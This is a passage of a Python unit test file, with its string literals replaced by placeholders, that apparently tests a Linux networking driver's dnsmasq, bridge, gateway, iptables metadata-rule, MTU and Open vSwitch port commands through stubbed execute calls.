dhcp_domain <EOL> for domain in ( '<STR_LIT>' , default_domain ) : <EOL> executes = [ ] <EOL> self . flags ( dhcp_domain = domain ) <EOL> fixedips = self . _get_fixedips ( network_ref ) <EOL> linux_net . restart_dhcp ( self . context , dev , network_ref , fixedips ) <EOL> expected = [ '<STR_LIT>' , <EOL> '<STR_LIT>' % jsonutils . dumps ( CONF . dhcpbridge_flagfile ) , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' % CONF . dnsmasq_config_file , <EOL> '<STR_LIT>' % linux_net . _dhcp_file ( dev , '<STR_LIT>' ) , <EOL> '<STR_LIT>' % linux_net . _dhcp_file ( dev , '<STR_LIT>' ) , <EOL> '<STR_LIT>' % network_ref [ '<STR_LIT>' ] , <EOL> '<STR_LIT>' , <EOL> "<STR_LIT>" % ( network_ref [ '<STR_LIT:label>' ] , <EOL> network_ref [ '<STR_LIT>' ] , <EOL> network_ref [ '<STR_LIT>' ] , <EOL> CONF . dhcp_lease_time ) , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' % linux_net . _dhcp_file ( dev , '<STR_LIT>' ) , <EOL> '<STR_LIT>' % CONF . dhcpbridge , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' ] <EOL> if CONF . dhcp_domain : <EOL> expected . append ( '<STR_LIT>' % CONF . dhcp_domain ) <EOL> if extra_expected : <EOL> expected += extra_expected <EOL> self . assertEqual ( [ ( dev , ) , tuple ( expected ) ] , executes ) <EOL> def test_dnsmasq_execute ( self ) : <EOL> self . _test_dnsmasq_execute ( ) <EOL> def test_dnsmasq_execute_dns_servers ( self ) : <EOL> self . flags ( dns_server = [ '<STR_LIT>' , '<STR_LIT>' ] ) <EOL> expected = [ <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> ] <EOL> self . _test_dnsmasq_execute ( expected ) <EOL> def test_dnsmasq_execute_use_network_dns_servers ( self ) : <EOL> self . flags ( use_network_dns_servers = True ) <EOL> expected = [ <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> ] <EOL> self . _test_dnsmasq_execute ( expected ) <EOL> def test_isolated_host ( self ) : <EOL> self . flags ( fake_network = False , <EOL> share_dhcp_address = True ) <EOL> self . stubs . 
Set ( linux_net , '<STR_LIT>' , <EOL> linux_net . IptablesManager ( ) ) <EOL> self . stubs . Set ( linux_net , '<STR_LIT>' , '<STR_LIT:test>' ) <EOL> executes = [ ] <EOL> def fake_execute ( * args , ** kwargs ) : <EOL> executes . append ( args ) <EOL> return "<STR_LIT>" , "<STR_LIT>" <EOL> self . stubs . Set ( utils , '<STR_LIT>' , fake_execute ) <EOL> driver = linux_net . LinuxBridgeInterfaceDriver ( ) <EOL> @ staticmethod <EOL> def fake_ensure ( bridge , interface , network , gateway ) : <EOL> return bridge <EOL> self . stubs . Set ( linux_net . LinuxBridgeInterfaceDriver , <EOL> '<STR_LIT>' , fake_ensure ) <EOL> iface = '<STR_LIT>' <EOL> dhcp = '<STR_LIT>' <EOL> network = { '<STR_LIT>' : dhcp , <EOL> '<STR_LIT>' : False , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : iface } <EOL> driver . plug ( network , '<STR_LIT>' ) <EOL> expected = [ <EOL> ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , iface , '<STR_LIT>' , dhcp , '<STR_LIT>' , '<STR_LIT>' ) , <EOL> ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , iface , '<STR_LIT>' , dhcp , '<STR_LIT>' , '<STR_LIT>' ) , <EOL> ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , iface , '<STR_LIT>' , dhcp , '<STR_LIT>' , '<STR_LIT>' ) , <EOL> ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , iface , '<STR_LIT>' , dhcp , '<STR_LIT>' , '<STR_LIT>' ) , <EOL> ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , iface , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) , <EOL> ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> 
'<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , iface , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) , <EOL> ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , iface , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) , <EOL> ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , iface , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) , <EOL> ( '<STR_LIT>' , '<STR_LIT:-c>' ) , <EOL> ( '<STR_LIT>' , '<STR_LIT:-c>' ) , <EOL> ( '<STR_LIT>' , '<STR_LIT:-c>' ) , <EOL> ( '<STR_LIT>' , '<STR_LIT:-c>' ) , <EOL> ] <EOL> self . assertEqual ( expected , executes ) <EOL> executes = [ ] <EOL> @ staticmethod <EOL> def fake_remove ( bridge , gateway ) : <EOL> return <EOL> self . stubs . Set ( linux_net . LinuxBridgeInterfaceDriver , <EOL> '<STR_LIT>' , fake_remove ) <EOL> driver . unplug ( network ) <EOL> expected = [ <EOL> ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , iface , '<STR_LIT>' , dhcp , '<STR_LIT>' , '<STR_LIT>' ) , <EOL> ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , iface , '<STR_LIT>' , dhcp , '<STR_LIT>' , '<STR_LIT>' ) , <EOL> ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , iface , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) , <EOL> ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , iface , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) , <EOL> ] <EOL> self . 
assertEqual ( expected , executes ) <EOL> def _test_initialize_gateway ( self , existing , expected , routes = '<STR_LIT>' ) : <EOL> self . flags ( fake_network = False ) <EOL> executes = [ ] <EOL> def fake_execute ( * args , ** kwargs ) : <EOL> executes . append ( args ) <EOL> if args [ <NUM_LIT:0> ] == '<STR_LIT>' and args [ <NUM_LIT:1> ] == '<STR_LIT>' and args [ <NUM_LIT:2> ] == '<STR_LIT>' : <EOL> return existing , "<STR_LIT>" <EOL> if args [ <NUM_LIT:0> ] == '<STR_LIT>' and args [ <NUM_LIT:1> ] == '<STR_LIT>' and args [ <NUM_LIT:2> ] == '<STR_LIT>' : <EOL> return routes , "<STR_LIT>" <EOL> if args [ <NUM_LIT:0> ] == '<STR_LIT>' : <EOL> return '<STR_LIT>' , '<STR_LIT>' <EOL> self . stubs . Set ( utils , '<STR_LIT>' , fake_execute ) <EOL> network = { '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' } <EOL> self . driver . initialize_gateway_device ( '<STR_LIT>' , network ) <EOL> self . assertEqual ( expected , executes ) <EOL> def test_initialize_gateway_moves_wrong_ip ( self ) : <EOL> existing = ( "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> expected = [ <EOL> ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) , <EOL> ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) , <EOL> ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) , <EOL> ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) , <EOL> ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) , <EOL> ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) , <EOL> ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , 
'<STR_LIT>' , '<STR_LIT>' ) , <EOL> ] <EOL> self . _test_initialize_gateway ( existing , expected ) <EOL> def test_initialize_gateway_ip_with_dynamic_flag ( self ) : <EOL> existing = ( "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> expected = [ <EOL> ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) , <EOL> ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) , <EOL> ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) , <EOL> ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) , <EOL> ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) , <EOL> ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) , <EOL> ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) , <EOL> ] <EOL> self . 
_test_initialize_gateway ( existing , expected ) <EOL> def test_initialize_gateway_resets_route ( self ) : <EOL> routes = ( "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> existing = ( "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> expected = [ <EOL> ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) , <EOL> ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) , <EOL> ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) , <EOL> ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT:default>' , '<STR_LIT>' , '<STR_LIT>' ) , <EOL> ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) , <EOL> ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) , <EOL> ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) , <EOL> ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) , <EOL> ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT:default>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' ) , <EOL> ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) , <EOL> ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) , <EOL> ] <EOL> self . 
_test_initialize_gateway ( existing , expected , routes ) <EOL> def test_initialize_gateway_no_move_right_ip ( self ) : <EOL> existing = ( "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> expected = [ <EOL> ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) , <EOL> ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) , <EOL> ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) , <EOL> ] <EOL> self . _test_initialize_gateway ( existing , expected ) <EOL> def test_initialize_gateway_add_if_blank ( self ) : <EOL> existing = ( "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> expected = [ <EOL> ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) , <EOL> ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) , <EOL> ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) , <EOL> ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) , <EOL> ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) , <EOL> ] <EOL> self . _test_initialize_gateway ( existing , expected ) <EOL> def test_ensure_floating_no_duplicate_forwards ( self ) : <EOL> ln = linux_net <EOL> self . stubs . Set ( ln . iptables_manager , '<STR_LIT>' , lambda : None ) <EOL> self . stubs . Set ( ln , '<STR_LIT>' , lambda * a , ** kw : None ) <EOL> net = { '<STR_LIT>' : '<STR_LIT>' , '<STR_LIT>' : '<STR_LIT>' } <EOL> ln . ensure_floating_forward ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , net ) <EOL> ln . ensure_floating_forward ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , net ) <EOL> two_forward_rules = len ( linux_net . iptables_manager . ipv4 [ '<STR_LIT>' ] . rules ) <EOL> ln . 
ensure_floating_forward ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , net ) <EOL> dup_forward_rules = len ( linux_net . iptables_manager . ipv4 [ '<STR_LIT>' ] . rules ) <EOL> self . assertEqual ( two_forward_rules , dup_forward_rules ) <EOL> def test_apply_ran ( self ) : <EOL> manager = linux_net . IptablesManager ( ) <EOL> manager . iptables_apply_deferred = False <EOL> self . mox . StubOutWithMock ( manager , '<STR_LIT>' ) <EOL> manager . _apply ( ) <EOL> self . mox . ReplayAll ( ) <EOL> empty_ret = manager . apply ( ) <EOL> self . assertIsNone ( empty_ret ) <EOL> def test_apply_not_run ( self ) : <EOL> manager = linux_net . IptablesManager ( ) <EOL> manager . iptables_apply_deferred = True <EOL> self . mox . StubOutWithMock ( manager , '<STR_LIT>' ) <EOL> self . mox . ReplayAll ( ) <EOL> manager . apply ( ) <EOL> def test_deferred_unset_apply_ran ( self ) : <EOL> manager = linux_net . IptablesManager ( ) <EOL> manager . iptables_apply_deferred = True <EOL> self . mox . StubOutWithMock ( manager , '<STR_LIT>' ) <EOL> manager . _apply ( ) <EOL> self . mox . ReplayAll ( ) <EOL> manager . defer_apply_off ( ) <EOL> self . assertFalse ( manager . iptables_apply_deferred ) <EOL> def _test_add_metadata_accept_rule ( self , expected ) : <EOL> def verify_add_rule ( chain , rule ) : <EOL> self . assertEqual ( '<STR_LIT>' , chain ) <EOL> self . assertEqual ( expected , rule ) <EOL> self . stubs . Set ( linux_net . iptables_manager . ipv4 [ '<STR_LIT>' ] , <EOL> '<STR_LIT>' , verify_add_rule ) <EOL> linux_net . metadata_accept ( ) <EOL> def _test_add_metadata_accept_ipv6_rule ( self , expected ) : <EOL> def verify_add_rule ( chain , rule ) : <EOL> self . assertEqual ( '<STR_LIT>' , chain ) <EOL> self . assertEqual ( expected , rule ) <EOL> self . stubs . Set ( linux_net . iptables_manager . ipv6 [ '<STR_LIT>' ] , <EOL> '<STR_LIT>' , verify_add_rule ) <EOL> linux_net . metadata_accept ( ) <EOL> def test_metadata_accept ( self ) : <EOL> self . 
flags ( metadata_port = '<STR_LIT>' ) <EOL> self . flags ( metadata_host = '<STR_LIT>' ) <EOL> expected = ( '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> self . _test_add_metadata_accept_rule ( expected ) <EOL> def test_metadata_accept_ipv6 ( self ) : <EOL> self . flags ( metadata_port = '<STR_LIT>' ) <EOL> self . flags ( metadata_host = '<STR_LIT>' ) <EOL> expected = ( '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> self . _test_add_metadata_accept_ipv6_rule ( expected ) <EOL> def test_metadata_accept_localhost ( self ) : <EOL> self . flags ( metadata_port = '<STR_LIT>' ) <EOL> self . flags ( metadata_host = '<STR_LIT:127.0.0.1>' ) <EOL> expected = ( '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> self . _test_add_metadata_accept_rule ( expected ) <EOL> def test_metadata_accept_ipv6_localhost ( self ) : <EOL> self . flags ( metadata_port = '<STR_LIT>' ) <EOL> self . flags ( metadata_host = '<STR_LIT>' ) <EOL> expected = ( '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> self . _test_add_metadata_accept_ipv6_rule ( expected ) <EOL> def _test_add_metadata_forward_rule ( self , expected ) : <EOL> def verify_add_rule ( chain , rule ) : <EOL> self . assertEqual ( '<STR_LIT>' , chain ) <EOL> self . assertEqual ( expected , rule ) <EOL> self . stubs . Set ( linux_net . iptables_manager . ipv4 [ '<STR_LIT>' ] , <EOL> '<STR_LIT>' , verify_add_rule ) <EOL> linux_net . metadata_forward ( ) <EOL> def test_metadata_forward ( self ) : <EOL> self . flags ( metadata_port = '<STR_LIT>' ) <EOL> self . flags ( metadata_host = '<STR_LIT>' ) <EOL> expected = ( '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> self . _test_add_metadata_forward_rule ( expected ) <EOL> def test_metadata_forward_localhost ( self ) : <EOL> self . flags ( metadata_port = '<STR_LIT>' ) <EOL> self . flags ( metadata_host = '<STR_LIT:127.0.0.1>' ) <EOL> expected = ( '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> self . _test_add_metadata_forward_rule ( expected ) <EOL> def test_ensure_bridge_brings_up_interface ( self ) : <EOL> self . 
flags ( fake_network = False ) <EOL> fake_mac = '<STR_LIT>' <EOL> fake_ifaces = { <EOL> netifaces . AF_LINK : [ { '<STR_LIT>' : fake_mac } ] <EOL> } <EOL> calls = { <EOL> '<STR_LIT>' : [ mock . call ( '<STR_LIT>' ) ] , <EOL> '<STR_LIT>' : [ <EOL> mock . call ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> run_as_root = True , check_exit_code = False ) , <EOL> mock . call ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT:address>' , fake_mac , <EOL> run_as_root = True ) , <EOL> mock . call ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> run_as_root = True , check_exit_code = False ) , <EOL> mock . call ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) , <EOL> mock . call ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' ) , <EOL> ] <EOL> } <EOL> with test . nested ( <EOL> mock . patch . object ( linux_net , '<STR_LIT>' , return_value = True ) , <EOL> mock . patch . object ( linux_net , '<STR_LIT>' , return_value = ( '<STR_LIT>' , '<STR_LIT>' ) ) , <EOL> mock . patch . object ( netifaces , '<STR_LIT>' ) <EOL> ) as ( device_exists , _execute , ifaddresses ) : <EOL> ifaddresses . return_value = fake_ifaces <EOL> driver = linux_net . LinuxBridgeInterfaceDriver ( ) <EOL> driver . ensure_bridge ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> device_exists . assert_has_calls ( calls [ '<STR_LIT>' ] ) <EOL> _execute . assert_has_calls ( calls [ '<STR_LIT>' ] ) <EOL> ifaddresses . assert_called_once_with ( '<STR_LIT>' ) <EOL> def test_ensure_bridge_brclt_addif_exception ( self ) : <EOL> def fake_execute ( * cmd , ** kwargs ) : <EOL> if ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) == cmd : <EOL> return ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> else : <EOL> return ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> with test . nested ( <EOL> mock . patch . object ( linux_net , '<STR_LIT>' , return_value = True ) , <EOL> mock . patch . 
object ( linux_net , '<STR_LIT>' , fake_execute ) <EOL> ) as ( device_exists , _ ) : <EOL> driver = linux_net . LinuxBridgeInterfaceDriver ( ) <EOL> self . assertRaises ( exception . NovaException , <EOL> driver . ensure_bridge , '<STR_LIT>' , '<STR_LIT>' ) <EOL> device_exists . assert_called_once_with ( '<STR_LIT>' ) <EOL> def test_ensure_bridge_brclt_addbr_neutron_race ( self ) : <EOL> def fake_execute ( * cmd , ** kwargs ) : <EOL> if ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) == cmd : <EOL> return ( '<STR_LIT>' , "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> else : <EOL> return ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> with test . nested ( <EOL> mock . patch . object ( linux_net , '<STR_LIT>' , return_value = False ) , <EOL> mock . patch . object ( linux_net , '<STR_LIT>' , fake_execute ) <EOL> ) as ( device_exists , _ ) : <EOL> driver = linux_net . LinuxBridgeInterfaceDriver ( ) <EOL> driver . ensure_bridge ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> device_exists . assert_called_once_with ( '<STR_LIT>' ) <EOL> def test_set_device_mtu_configured ( self ) : <EOL> self . flags ( network_device_mtu = <NUM_LIT> ) <EOL> calls = [ <EOL> mock . call ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> <NUM_LIT> , run_as_root = True , <EOL> check_exit_code = [ <NUM_LIT:0> , <NUM_LIT:2> , <NUM_LIT> ] ) <EOL> ] <EOL> with mock . patch . object ( utils , '<STR_LIT>' , return_value = ( '<STR_LIT>' , '<STR_LIT>' ) ) as ex : <EOL> linux_net . _set_device_mtu ( '<STR_LIT>' ) <EOL> ex . assert_has_calls ( calls ) <EOL> def test_set_device_mtu_default ( self ) : <EOL> calls = [ ] <EOL> with mock . patch . object ( utils , '<STR_LIT>' , return_value = ( '<STR_LIT>' , '<STR_LIT>' ) ) as ex : <EOL> linux_net . _set_device_mtu ( '<STR_LIT>' ) <EOL> ex . assert_has_calls ( calls ) <EOL> def _ovs_vif_port ( self , calls , interface_type = None ) : <EOL> with mock . patch . object ( utils , '<STR_LIT>' , return_value = ( '<STR_LIT>' , '<STR_LIT>' ) ) as ex : <EOL> linux_net . 
create_ovs_vif_port ( '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> interface_type = interface_type ) <EOL> ex . assert_has_calls ( calls ) <EOL> def test_ovs_vif_port_cmd ( self ) : <EOL> expected = [ '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' <EOL> ] <EOL> cmd = linux_net . _create_ovs_vif_cmd ( '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' ) <EOL> self . assertEqual ( expected , cmd ) <EOL> expected += [ '<STR_LIT>' ] <EOL> cmd = linux_net . _create_ovs_vif_cmd ( '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' ) <EOL> self . assertEqual ( expected , cmd ) <EOL> def test_ovs_vif_port ( self ) : <EOL> calls = [ <EOL> mock . call ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> run_as_root = True ) <EOL> ] <EOL> self . _ovs_vif_port ( calls ) <EOL> @ mock . patch . object ( linux_net , '<STR_LIT>' ) <EOL> @ mock . patch . object ( linux_net , '<STR_LIT>' ) <EOL> @ mock . patch . object ( linux_net , '<STR_LIT>' ) <EOL> def test_ovs_vif_port_with_type_vhostuser ( self , mock_set_device_mtu , <EOL> mock_create_cmd , mock_vsctl ) : <EOL> linux_net . create_ovs_vif_port ( <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> "<STR_LIT>" , mtu = <NUM_LIT> , <EOL> interface_type = network_model . OVS_VHOSTUSER_INTERFACE_TYPE ) <EOL> mock_create_cmd . 
